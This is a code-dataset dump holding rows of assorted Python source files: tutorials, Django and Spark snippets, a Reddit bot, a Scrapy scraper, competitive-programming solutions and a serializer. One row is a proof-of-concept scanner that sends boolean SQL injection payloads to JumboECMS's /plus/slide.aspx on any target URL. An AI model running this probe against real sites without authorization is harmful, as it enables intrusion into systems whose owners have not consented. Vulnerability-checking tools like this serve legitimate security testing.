blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5f4574f19704732b35e9a1608f3760eaacfdcd64 | bd93fa910151c278be8249055bc084e5a5c35a6a | /Python/itcast/01-Python进阶1/3面向对象/02魔法方法str.py | 87b7cb966fb02fd2b8c31c726aea63b56963dabb | []
| no_license | ahojcn/practice-code | bd81595b80239cd2550183093566bd536a83ed3f | b65f4e76271479269463e92fd3fd41585c2ac792 | refs/heads/master | 2021-07-10T14:15:08.036592 | 2020-07-09T11:32:16 | 2020-07-09T11:32:16 | 153,059,349 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | """
__str__ 相当于 Java 中的 toString()
"""
class Cat:
def __init__(self, name, age, sex):
self._name = name
self._age = age
self._sex = sex
def __str__(self):
return "姓名:" + self._name \
+ "年龄:" + str(self._age) \
+ "性别:" + self._sex
def eat(self):
print(self._name + "吃鱼...")
def drink(self):
print(self._name + "喝可乐...")
def info(self):
print("name:" + self._name + \
", age:" + str(self._age) + \
", sex:" + self._sex)
tom = Cat("汤姆", 20, "男")
print(tom)
print(" 分界线 ".center(50, "*"))
lanmao = Cat("蓝猫", 10, "女")
print(lanmao)
| [
"[email protected]"
]
| |
e81a46145ac0da82da2536133a7c0a69c8ffc392 | 7c82896f5322ffd5d61697ed597f4d2c53e4e744 | /backend/ecommernce_25667/wsgi.py | 16d515f35532223e7e77c29bf39f2a5ff06566df | []
| no_license | crowdbotics-apps/ecommernce-25667 | c4487f6c19a3d4dc608fd2a13291f74c84b53dc7 | 55dd1c6293fcfbec01aec7e8e0118ed8b1c48130 | refs/heads/master | 2023-04-02T00:48:51.026549 | 2021-04-13T19:40:25 | 2021-04-13T19:40:25 | 357,668,171 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | """
WSGI config for ecommernce_25667 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ecommernce_25667.settings")
application = get_wsgi_application()
| [
"[email protected]"
]
| |
539f8f2da156d8b3ce8a755659f688fe6ee1d71e | a1119965e2e3bdc40126fd92f4b4b8ee7016dfca | /branches/nacl_repy/seattlelib/serialize.repy | 29a142d7996092ac9787ccb13497c54fdc3571d5 | [
"MIT"
]
| permissive | SeattleTestbed/attic | 0e33211ddf39efdbcf5573d4fc7fa5201aa7310d | f618a962ce2fd3c4838564e8c62c10924f5df45f | refs/heads/master | 2021-06-10T23:10:47.792847 | 2017-05-15T12:05:43 | 2017-05-15T12:05:43 | 20,154,061 | 0 | 1 | null | 2014-10-16T17:21:06 | 2014-05-25T12:34:00 | Python | UTF-8 | Python | false | false | 6,493 | repy | """
Author: Justin Cappos
Start date: October 9th, 2009
Purpose: A simple library that serializes and deserializes built-in repy types.
This includes strings, integers, floats, booleans, None, complex, tuples,
lists, sets, frozensets, and dictionaries.
There are no plans for including objects.
Note: that all items are treated as separate references. This means things
like 'a = []; a.append(a)' will result in an infinite loop. If you have
'b = []; c = (b,b)' then 'c[0] is c[1]' is True. After deserialization
'c[0] is c[1]' is False.
I can add support or detection of this if desired.
"""
# The basic idea is simple. Say the type (a character) followed by the
# type specific data. This is adequate for simple types
# that do not contain other types. Types that contain other types, have
# a length indicator and then the underlying items listed sequentially.
# For a dict, this is key1value1key2value2.
def serializedata(data):
"""
<Purpose>
Convert a data item of any type into a string such that we can
deserialize it later.
<Arguments>
data: the thing to seriailize. Can be of essentially any type except
objects.
<Exceptions>
TypeError if the type of 'data' isn't allowed
<Side Effects>
None.
<Returns>
A string suitable for deserialization.
"""
# this is essentially one huge case statement...
# None
if type(data) == type(None):
return 'N'
# Boolean
elif type(data) == type(True):
if data == True:
return 'BT'
else:
return 'BF'
# Integer / Long
elif type(data) is int or type(data) is long:
datastr = str(data)
return 'I'+datastr
# Float
elif type(data) is float:
datastr = str(data)
return 'F'+datastr
# Complex
elif type(data) is complex:
datastr = str(data)
if datastr[0] == '(' and datastr[-1] == ')':
datastr = datastr[1:-1]
return 'C'+datastr
# String
elif type(data) is str:
return 'S'+data
# List or tuple or set or frozenset
elif type(data) is list or type(data) is tuple or type(data) is set or type(data) is frozenset:
# the only impact is the first letter...
if type(data) is list:
mystr = 'L'
elif type(data) is tuple:
mystr = 'T'
elif type(data) is set:
mystr = 's'
elif type(data) is frozenset:
mystr = 'f'
else:
raise Exception("InternalError: not a known type after checking")
for item in data:
thisitem = serializedata(item)
# Append the length of the item, plus ':', plus the item. 1 -> '2:I1'
mystr = mystr + str(len(thisitem))+":"+thisitem
mystr = mystr + '0:'
return mystr
# dict
elif type(data) is dict:
mystr = 'D'
keysstr = serializedata(data.keys())
# Append the length of the list, plus ':', plus the list.
mystr = mystr + str(len(keysstr))+":"+keysstr
# just plop the values on the end.
valuestr = serializedata(data.values())
mystr = mystr + valuestr
return mystr
# Unknown!!!
else:
raise TypeError("Unknown type '"+str(type(data))+"' for data :"+str(data))
def deserializedata(datastr):
"""
<Purpose>
Convert a serialized data string back into its original types.
<Arguments>
datastr: the string to deseriailize.
<Exceptions>
ValueError if the string is corrupted
TypeError if the type of 'data' isn't allowed
<Side Effects>
None.
<Returns>
Items of the original type
"""
if type(datastr) != str:
raise TypeError("Cannot deserialize non-string of type '"+str(type(datastr))+"'")
typeindicator = datastr[0]
restofstring = datastr[1:]
# this is essentially one huge case statement...
# None
if typeindicator == 'N':
if restofstring != '':
raise ValueError("Malformed None string '"+restofstring+"'")
return None
# Boolean
elif typeindicator == 'B':
if restofstring == 'T':
return True
elif restofstring == 'F':
return False
raise ValueError("Malformed Boolean string '"+restofstring+"'")
# Integer / Long
elif typeindicator == 'I':
try:
return int(restofstring)
except ValueError:
raise ValueError("Malformed Integer string '"+restofstring+"'")
# Float
elif typeindicator == 'F':
try:
return float(restofstring)
except ValueError:
raise ValueError("Malformed Float string '"+restofstring+"'")
# Float
elif typeindicator == 'C':
try:
return complex(restofstring)
except ValueError:
raise ValueError("Malformed Complex string '"+restofstring+"'")
# String
elif typeindicator == 'S':
return restofstring
# List / Tuple / set / frozenset / dict
elif typeindicator == 'L' or typeindicator == 'T' or typeindicator == 's' or typeindicator == 'f':
# We'll split this and keep adding items to the list. At the end, we'll
# convert it to the right type
thislist = []
data = restofstring
# We'll use '0:' as our 'end separator'
while data != '0:':
lengthstr, restofdata = data.split(':', 1)
length = int(lengthstr)
# get this item, convert to a string, append to the list.
thisitemdata = restofdata[:length]
thisitem = deserializedata(thisitemdata)
thislist.append(thisitem)
# Now toss away the part we parsed.
data = restofdata[length:]
if typeindicator == 'L':
return thislist
elif typeindicator == 'T':
return tuple(thislist)
elif typeindicator == 's':
return set(thislist)
elif typeindicator == 'f':
return frozenset(thislist)
else:
raise Exception("InternalError: not a known type after checking")
elif typeindicator == 'D':
lengthstr, restofdata = restofstring.split(':', 1)
length = int(lengthstr)
# get this item, convert to a string, append to the list.
keysdata = restofdata[:length]
keys = deserializedata(keysdata)
# The rest should be the values list.
values = deserializedata(restofdata[length:])
if type(keys) != list or type(values) != list or len(keys) != len(values):
raise ValueError("Malformed Dict string '"+restofstring+"'")
thisdict = {}
for position in xrange(len(keys)):
thisdict[keys[position]] = values[position]
return thisdict
# Unknown!!!
else:
raise ValueError("Unknown typeindicator '"+str(typeindicator)+"' for data :"+str(restofstring))
| [
"USER@DOMAIN"
]
| USER@DOMAIN |
80475aeee17df3cba099d4d162c7d768068d604d | 6c219c027c7d0ef454bdeac196bd773e8b95d602 | /cms/jumboecms/jumboecms_slide_id_sqli.py | 2b692758481ff7bb88275db2b44434dd22f770e3 | []
| no_license | aStrowxyu/pocscan | 663f3a3458140e1bce7b4dc3702c6014a4c9ac92 | 08c7e7454c6b7c601bc54c21172c4788312603b1 | refs/heads/master | 2020-04-19T10:00:56.569105 | 2019-01-29T09:31:31 | 2019-01-29T09:31:31 | 168,127,418 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,432 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: JumboECMS V1.6.1 注入漏洞
referer: http://www.wooyun.org/bugs/wooyun-2010-062717
author: Lucifer
description: 文件/plus/slide.aspx参数id存在SQL注入。
'''
import sys
import requests
import warnings
from termcolor import cprint
class jumboecms_slide_id_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
trueurl = self.url + "/plus/slide.aspx?id=1%20AnD%201=1"
falseurl = self.url + "/plus/slide.aspx?id=1%20AnD%201=2"
try:
req1 = requests.get(trueurl, headers=headers, timeout=10, verify=False)
req2 = requests.get(falseurl, headers=headers, timeout=10, verify=False)
if r"Stack trace" not in req1.text and r"Stack trace" in req2.text:
cprint("[+]存在JumboECMS V1.6.1 注入漏洞...(高危)\tpayload: "+falseurl, "red")
else:
cprint("[-]不存在jumboecms_slide_id_sqli漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = jumboecms_slide_id_sqli_BaseVerify(sys.argv[1])
testVuln.run() | [
"[email protected]"
]
| |
fff42786877735c43c12c0b6b7b613c376845e8c | 6375b7e4dfe11ced7dcd3fad1a7a2de9a504910d | /exc7_more_print.py | 9a734f30db2a725ccfb434e3859ea93eda66107f | []
| no_license | yaowenqiang/lpthw | b65e6b8ce576e7caa5cfba5570550e546d1e0549 | 4bbd7ebb4e8c570a39bf9c55df9bd97e4f86e1e5 | refs/heads/master | 2020-04-01T10:57:32.959389 | 2019-05-01T09:27:25 | 2019-05-01T09:27:25 | 153,140,026 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | print("Mary had a little lamb.")
print("Its fleece was white as {}.".format("snow"))
print("And everywhere that Mary went.")
print("." * 10)
end1 = "c"
end2 = "h"
end3 = "e"
end4 = "e"
end5 = "s"
end6 = "e"
end7 = "b"
end8 = "u"
end9 = "r"
end10 = "g"
end11 = "e"
end12 = "r"
print(end1 + end2 + end3 + end4 + end5 + end6, end=" ")
print(end7 + end8 + end9 + end10 + end11 + end12)
| [
"[email protected]"
]
| |
c0bca8d865bf372c3ad7e16a347e11b50c5bd363 | 6a7058009587e78b5c758ff783410325ad7c2a4b | /leet/trees/serializeDeserialize.py | 11901325add1a326d48e38679f57ee4d830890e5 | [
"Apache-2.0"
]
| permissive | stacykutyepov/python-cp-cheatsheet | 8b96b76403c501f5579befd07b3c4a4c69fe914e | a00a57e1b36433648d1cace331e15ff276cef189 | refs/heads/master | 2023-07-16T13:26:35.130763 | 2021-08-30T11:23:39 | 2021-08-30T11:23:39 | 401,442,535 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Codec:
def serialize(self, root):
"""Encodes a tree to a single string.
:type root: TreeNode
:rtype: str
"""
rtn = []
def dfs(node):
if node:
rtn.append(str(node.val))
dfs(node.left)
dfs(node.right)
else:
rtn.append('#')
dfs(root)
return ' '.join(rtn)
def deserialize(self, data):
"""Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
def dfs():
val = next(vals)
if val == '#':
return None
else:
node = TreeNode(int(val))
node.left = dfs()
node.right = dfs()
return node
vals = iter(data.split())
return dfs()
# Your Codec object will be instantiated and called as such:
# codec = Codec()
# codec.deserialize(codec.serialize(root))
['1', '3', '5', '#', '6', '#', '#', '2', '#', '4', '#', '#']
['1', '3', '5', '#', '6', '#', '#', '2', '#', '4', '#', '#']
| [
"[email protected]"
]
| |
ae112f60c472608d64fea6061820870ce341dd5c | 048df2b4dc5ad153a36afad33831017800b9b9c7 | /atcoder/arc030/arc030_2.py | fb80908cb169ecdb2886d69d72282652698d8452 | []
| no_license | fluffyowl/past-submissions | a73e8f5157c647634668c200cd977f4428c6ac7d | 24706da1f79e5595b2f9f2583c736135ea055eb7 | refs/heads/master | 2022-02-21T06:32:43.156817 | 2019-09-16T00:17:50 | 2019-09-16T00:17:50 | 71,639,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,146 | py | def reduce_graph(root, children, houseki):
def rec_dfs(node):
removals = []
for c in children[node]:
if not rec_dfs(c):
removals.append(c)
for i in removals[::-1]:
children[node].remove(i)
if len(children[node]) == 0 and houseki[node] == 0:
return False
else:
return True
rec_dfs(root)
return children
def solve():
n, root = map(int, raw_input().split())
root -= 1
rinsetsu = [[] for i in range(n)]
houseki = map(int, raw_input().split())
for i in range(n-1):
x, y = map(lambda x:int(x)-1, raw_input().split())
rinsetsu[x].append(y)
rinsetsu[y].append(x)
children = [[] for i in range(n)]
stack = [(root, None)]
while len(stack) != 0:
node, parent = stack.pop()
for child in rinsetsu[node]:
if child != parent:
children[node].append(child)
stack.append((child, node))
children = reduce_graph(root, children, houseki)
s = 0
for i in range(n):
s += len(children[i]) * 2
print s
solve()
| [
"[email protected]"
]
| |
71724e17def474442e5c246dd126c278d482fb73 | 74482894c61156c13902044b4d39917df8ed9551 | /test/test_get_contract_details_by_address_response_item.py | 924e6c10948054f2f336b69dea39bc685b9e522f | [
"MIT"
]
| permissive | xan187/Crypto_APIs_2.0_SDK_Python | bb8898556ba014cc7a4dd31b10e24bec23b74a19 | a56c75df54ef037b39be1315ed6e54de35bed55b | refs/heads/main | 2023-06-22T15:45:08.273635 | 2021-07-21T03:41:05 | 2021-07-21T03:41:05 | 387,982,780 | 1 | 0 | NOASSERTION | 2021-07-21T03:35:29 | 2021-07-21T03:35:29 | null | UTF-8 | Python | false | false | 1,353 | py | """
CryptoAPIs
Crypto APIs 2.0 is a complex and innovative infrastructure layer that radically simplifies the development of any Blockchain and Crypto related applications. Organized around REST, Crypto APIs 2.0 can assist both novice Bitcoin/Ethereum enthusiasts and crypto experts with the development of their blockchain applications. Crypto APIs 2.0 provides unified endpoints and data, raw data, automatic tokens and coins forwardings, callback functionalities, and much more. # noqa: E501
The version of the OpenAPI document: 2.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import cryptoapis
from cryptoapis.model.get_contract_details_by_address_response_item import GetContractDetailsByAddressResponseItem
class TestGetContractDetailsByAddressResponseItem(unittest.TestCase):
"""GetContractDetailsByAddressResponseItem unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGetContractDetailsByAddressResponseItem(self):
"""Test GetContractDetailsByAddressResponseItem"""
# FIXME: construct object with mandatory attributes with example values
# model = GetContractDetailsByAddressResponseItem() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
]
| |
3a48961a4b6dd2e091a6c553297caabc8dfe0bf9 | 8501165bbbc6acf017b062c846a3ef7ef8624dc0 | /dataframes.py | 5e95c158a85cf9e26deb466f6ef7e8a54bd9025e | []
| no_license | olavosamp/spark_tutorial | df9edcc3cf82fc2103dd4f889e13eec22f97fbcc | c80d0e8259eda0dc443c3af259a3b11241ba63fa | refs/heads/master | 2023-03-29T09:20:08.279790 | 2021-03-26T20:01:40 | 2021-03-26T20:01:40 | 351,897,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | from pyspark.sql import SparkSession
from pyspark.sql.types import StructType, StructField, StringType, IntegerType
spark = SparkSession.builder.master("local[1]").appName("SparkbyExamples.com").getOrCreate()
data = [
("George", "M", 12),
("Adolf","M", 14),
("Emilia","F", 16),
]
print("\nOriginal RDD")
rdd = spark.sparkContext.parallelize(data)
print(rdd)
print("RDD Count ", rdd.count())
print("\nDataFrame from RDD")
df_rdd = rdd.toDF()
df_rdd.show()
print("\nDataFrame from list")
columns = ["Name", "Sex", "Age"]
df_list = spark.createDataFrame(data=data, schema=columns)
df_list.show()
print(df_list.head())
print("\nDataFrame with Schema")
schema = StructType([
StructField("Name", StringType(), False),
StructField("Sex", StringType(), True),
StructField("Age", IntegerType(), True),
])
df_schema = spark.createDataFrame(data=data, schema=schema)
df_schema.printSchema()
df_schema.show(truncate=False)
exit()
print("\nDataFrame from csv")
df_csv = spark.read.csv("test.csv", header=True)
df_csv.printSchema()
df_csv.show()
df_csv.createOrReplaceTempView("PERSON_DATA")
df_sql = spark.sql("SELECT * FROM PERSON_DATA")
df_sql.show()
df_groupby = spark.sql("SELECT Sex, COUNT(*) FROM PERSON_DATA GROUP BY Sex")
df_groupby.show() | [
"[email protected]"
]
| |
ef0aaacd8fedf13c8a18d46944b7df0927c88d38 | e905abd9bb7bd7017657d0a0c4d724d16e37044c | /.history/article/spiders/ieee_20210206223025.py | 4220b80e3f61daeddb62f3b9b60b2bc1a791ce13 | []
| no_license | tabdelbari/articles | a8b921841f84fb473f5ed1cdcda743863e6bc246 | f0e1dfdc9e818e43095933139b6379a232647898 | refs/heads/main | 2023-03-05T10:21:35.565767 | 2021-02-10T13:35:14 | 2021-02-10T13:35:14 | 325,654,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,534 | py | import scrapy
import logging
import re
from scrapy_splash import SplashRequest, request
from article.items import ArticleItem
import json
class IeeeSpider(scrapy.Spider):
name = 'ieee'
allowed_domains = ['ieee.org']
lua_script = """
function main(splash, args)
assert(splash:go{
splash.args.url,
headers=splash.args.headers,
http_method=splash.args.http_method,
body=splash.args.body,
})
assert(splash:wait(10))
return splash:html()
end
"""
def __init__(self, topic='', keywords='', **kwargs):
super().__init__(**kwargs)
# self.start_urls = ['https://ieeexplore.ieee.org/search/searchresult.jsp?newsearch=true&queryText=%s' %keywords]
self.post_url = 'https://ieeexplore.ieee.org/rest/search'
self.headers = {
'Origin': 'https://ieeexplore.ieee.org',
'Host': 'ieeexplore.ieee.org',
'Accept-Language': 'fr-MA,fr;q=0.9,en-US;q=0.8,en;q=0.7,ar-MA;q=0.6,ar;q=0.5,fr-FR;q=0.4',
'Accept-Encoding': 'gzip, deflate, br',
'Accept': 'application/json',
'Content-Type': 'application/json'
}
self.topic = topic
self.keywords = keywords
self.totalPages = 0
def start_requests(self):
post_data = '{"queryText": "' + self.topic + \
'", "highlight": true, "returnType": "SEARCH", "matchPubs": true, "rowsPerPage": 100, "returnFacets": ["ALL"]}'
yield SplashRequest(self.post_url, self.init_articles, endpoint='execute',
magic_response=True, meta={'handle_httpstatus_all': True, 'data': 'hello'},
args={'lua_source': self.lua_script, 'http_method': 'POST', 'body': post_data, 'headers': self.headers})
def init_articles(self, response):
# response.meta['data'] -> "hello"
jr = json.loads(response.xpath('//*/pre/text()').get(default=''))
self.totalPages = jr['totalPages']
for i in range(1, (self.totalPages+1)):
post_data = '{"queryText": "' + self.topic + \
'", "highlight": true, "returnType": "SEARCH", "matchPubs": true, "rowsPerPage": 100, "returnFacets": ["ALL"], "pageNumber": '+str(i)+'}'
yield SplashRequest(self.post_url, self.parse_1, endpoint='execute',
magic_response=True, meta={'handle_httpstatus_all': True, 'data': i},
args={'lua_source': self.lua_script, 'http_method': 'POST', 'body': post_data, 'headers': self.headers})
pass
def parse_1(self, response):
logging.info('##################################Processing:' + str(response.meta['data']))
jr = json.loads(response.xpath('//*/pre/text()').get(default=''))
for record in jr['records']:
result = {
'title': record['articleTitle'],
'authors': '|'.join(list(map(lambda author: author['preferredName'], record['authors']))),
'country': '',
'abstract': record['abstract'],
'date_pub': record['publicationDate'],
'journal': record['publicationTitle'],
'topic': self.topic
}
# search for country
yield SplashRequest(self.post_url, self.init_articles, endpoint='execute',
magic_response=True, meta={'handle_httpstatus_all': True, 'data': result},
args={'lua_source': self.lua_script, 'http_method': 'GET', 'body': null, 'headers': self.headers})
# find abstract for this article and pass as meta the half of object: record['articleNumber']
pass
def parse(self, response):
jr = json.loads(response.xpath('//*/pre/text()').get(default=''))
for record in jr['records']:
result = {
'title': record['articleTitle'],
'authors': '|'.join(list(map(lambda author: author['preferredName'], record['authors']))),
'country': '',
'abstract': record['abstract'],
'date_pub': record['publicationDate'],
'journal': record['publicationTitle'],
'topic': self.topic,
'latitude': '',
'longitude': ''
}
# search for country
yield request
# find abstract for this article and pass as meta the half of object: record['articleNumber']
pass
| [
"[email protected]"
]
| |
7d81e0e0ff8208f3ac7143677298a42c4f2a1199 | 481b4b6955c6ddb5d962da5f2c8f9bf6d49d4f4c | /virtual/bin/pip | 63518a7dfa1e3b162a75c4bfdd69ccb87c3d5ea8 | []
| no_license | sanii-muthui/motoblog | b0b72c2013741a8a0dcb93ebc96cbce2edd220a6 | d82ae26184b75a433aaeefcd77c0bbe174bfe27f | refs/heads/master | 2022-10-03T08:55:29.879056 | 2019-08-13T07:02:07 | 2019-08-13T07:02:07 | 202,012,043 | 0 | 0 | null | 2022-09-16T18:08:10 | 2019-08-12T21:30:57 | Python | UTF-8 | Python | false | false | 246 | #!/home/sanii/Desktop/motoblog/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
]
| ||
3cd9bfc221cf246f3a393362774ee3f9883a9923 | 288a00d2ab34cba6c389b8c2444455aee55a8a95 | /tests/data23/recipe-496895.py | 705c281fd7ebdc79fa6b70e2cc5c4d5bbf46119c | [
"BSD-2-Clause"
]
| permissive | JohannesBuchner/pystrict3 | ffd77b7bbc378bd4d8f21b5c6bd69a0d64a52ddb | 18b0dd369082422f9bf0f89c72e7acb53a49849c | refs/heads/master | 2023-08-14T06:37:37.954880 | 2023-07-13T11:16:38 | 2023-07-13T11:16:38 | 268,571,175 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,143 | py | import string
def rebase(i, frombase=None, tobase=None, fromalphabet=None, toalphabet=None, resize=1, too_big=40000, debug=False):
''' if frombase is not specified, it is guessed from the type and/or char in i with highest ord.
tobase defaults to [10, 2][frombase == 10].
the alphabets are map(chr, range(256)) if its base is between 62 and 255;
otherwise, string.digits+string.letters.
always returns a string which is also valid input.
valid bases are ints in range(-256, 257).
alphabets must be subscriptable, and can only contain str's.
invalid tobases are replied with 'why?'; rebase('why?') == '217648673'.
returned string is zfilled to the next largest multiple of resize
'''
if frombase == None:
if isinstance(i, int):
frombase = 10
elif isinstance(i, str):
a = str(i)
if any([(chr(x) in a) for x in list(range(ord('0'))) + list(range(58, 65)) + list(range(91, 97)) + list(range(123, 256))]):
frombase = max(list(map(ord, a))) + 1
else:
frombase = max(list(map((string.digits + string.letters).index, a))) + 1
if tobase == None:
tobase = [10, 2][frombase == 10]
# got bases, ensuring that everything is an int
tobase = int(tobase)
frombase = int(frombase)
abstobase = abs(tobase)
absfrombase = abs(frombase)
if absfrombase in [0, 1]:
i = len(str(i))
elif 2 <= frombase <= 36:
# may be difficult to translate to C
i = int(str(i), frombase)
else:
i = str(i)
n = 0
if fromalphabet == None:
if 62 <= absfrombase <= 256:
fromalphabet = list(map(chr, list(range(256))))
else:
fromalphabet = string.digits + string.letters
fromalphabet = fromalphabet[:absfrombase]
for j in range(len(i)):
n += (frombase ** j) * fromalphabet.index(i[-1-j])
i = n
# got ints, converting to tobase
if debug: print('converting %d from base %d to %d' % (i, frombase, tobase))
if abstobase in [0, 1]:
return '0' * ((i > 0) and int(i) or 0)
elif abstobase > 256:
return 'why?'
# if execution gets here, we might want the result to be zfilled to a multiple of resize
r = ''
if tobase == 10:
r = str(i)
else:
if i < 0:
print('negative', end=' ')
i = -i
if toalphabet is None:
if 62 <= abstobase <= 256:
toalphabet = list(map(chr, list(range(abstobase))))
else:
toalphabet = (string.digits + string.letters)[:abstobase]
if tobase < 0:
i = -i
j = 0
while i != 0:
r = toalphabet[i % tobase] + r
i /= tobase
j += 1
if j >= too_big: raise "call again; set too_big bigger"
if resize > 1:
if 62 <= abstobase <= 256:
r = toalphabet[0] * (resize - (len(r) % resize)) + r
else:
r = r.zfill(len(r) + resize - (len(r) % resize))
return r
| [
"[email protected]"
]
| |
e54a39dbfad7a724eeeaa1ef31bddec82f0bd60a | b5ca0a2ce47fdb4306bbdffcb995eb7e6eac1b23 | /Problem Solving/Algorithms/Strings/Strong Password/Strong_Password.py | ffab59cbf509d72ada08350dae73075e23cc95ca | []
| no_license | rsoemardja/HackerRank | ac257a66c3649534197b223b8ab55011d84fb9e1 | 97d28d648a85a16fbe6a5d6ae72ff6503a063ffc | refs/heads/master | 2022-04-14T22:46:03.412359 | 2020-04-03T07:44:04 | 2020-04-03T07:44:04 | 217,687,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the minimumNumber function below.
def minimumNumber(n, password):
# Return the minimum number of characters to make the password strong
count = 0
if any(i.isdigit() for i in password)==False:
count+=1
if any(i.islower() for i in password)==False:
count+=1
if any(i.isupper() for i in password)==False:
count+=1
if any(i in '!@#$%^&*()-+' for i in password)==False:
count+=1
return max(count,6-n)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
password = input()
answer = minimumNumber(n, password)
fptr.write(str(answer) + '\n')
fptr.close()
| [
"[email protected]"
]
| |
0250af5de2c470cdfe5b35e79ad11ff9fecf0505 | b3aa3d77836fa8f05b54d68e7bd6bff19dced90d | /Atcoder/166/F.py | cebe95a2befd384d575177108224c95f438c7ef8 | []
| no_license | anoubhav/Codeforces-Atcoder-Codechef-solutions | 660c5b78723791bc33b1d51977bf11ebe6dfe4c1 | aeebcae332af64aba49f52261d11aa6996f33b1c | refs/heads/master | 2022-12-08T14:02:49.574928 | 2020-08-29T14:18:30 | 2020-08-29T14:18:30 | 255,004,401 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 878 | py | n, a, b, c = list(map(int, input().split()))
slist = []
d = {'A': a, 'B':b, 'C':c}
soln = []
prev = None
for i in range(n):
s = input()
# corner case
if prev:
if prev[0] in s:
d[prev[0]] += 1
d[prev[1]] -= 1
soln.append(prev[0])
else:
d[prev[1]] += 1
d[prev[0]] -= 1
soln.append(prev[1])
prev = None
# corner case
if d[s[0]] ==1 and d[s[1]] == 1:
prev = s
# greedy
elif d[s[0]] >= d[s[1]]:
d[s[0]] -= 1
d[s[1]] += 1
soln.append(s[1])
elif d[s[0]] < d[s[1]]:
d[s[1]] -= 1
d[s[0]] += 1
soln.append(s[0])
if d['A'] < 0 or d['B'] < 0 or d['C'] < 0:
print('No')
exit()
break
print('Yes')
print('\n'.join(soln))
| [
"[email protected]"
]
| |
3bc0fa150804ea42ba257f13005f8613c6d86e46 | d3dc206446cffc919a7b3fb0838ca0ef14043e04 | /redditbot/worker.py | 3af98330efac68cb5f8d935bf1d5e72af2b2adfd | []
| no_license | gtmanfred/redditbot | 70ff2e2d1a63a4d272db93301ebb4f21acf16dae | 05d8f24620c9a3847c7e0c37ae8015e048af312e | refs/heads/master | 2020-04-18T14:56:02.289674 | 2015-10-19T01:22:40 | 2015-10-19T01:22:40 | 42,025,013 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,117 | py | from kombu.connection import BrokerConnection
from kombu.mixins import ConsumerMixin
from blinker import signal
import logging
from redditbot.queues import task_queues
logger = logging.getLogger(__name__)
class Worker(ConsumerMixin):
def __init__(self, connection, config):
self.connection = BrokerConnection(connection)
self.config = config
def get_consumers(self, Consumer, channel):
return [Consumer(queues=task_queues,
accept=['pickle', 'json'],
callbacks=[self.process_task])]
def process_task(self, body, message):
post = body['post']
logger.info('Got task: %s', post.id)
try:
logger.info(
'New Post for %s: %s',
post.subreddit.display_name, str(post)
)
for channel in \
self.config['subreddits'][post.subreddit.display_name]:
signal('send-message').send(channel, message=post)
message.ack()
except Exception as exc:
logger.error('Exception Raised: %r', exc)
| [
"[email protected]"
]
| |
1287031215a5c2e62234091f3722019c1952123e | 3bcc247a2bc1e0720f0344c96f17aa50d4bcdf2d | /第三阶段笔记/x.py | 9a4ea86bafae287fe00bb41414f17d9df388718a | []
| no_license | qianpeng-shen/Study_notes | 6f77f21a53266476c3c81c9cf4762b2efbf821fa | 28fb9a1434899efc2d817ae47e94c31e40723d9c | refs/heads/master | 2021-08-16T19:12:57.926127 | 2021-07-06T03:22:05 | 2021-07-06T03:22:05 | 181,856,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,542 | py | import time
HTML_ROOT_DIR="./static"
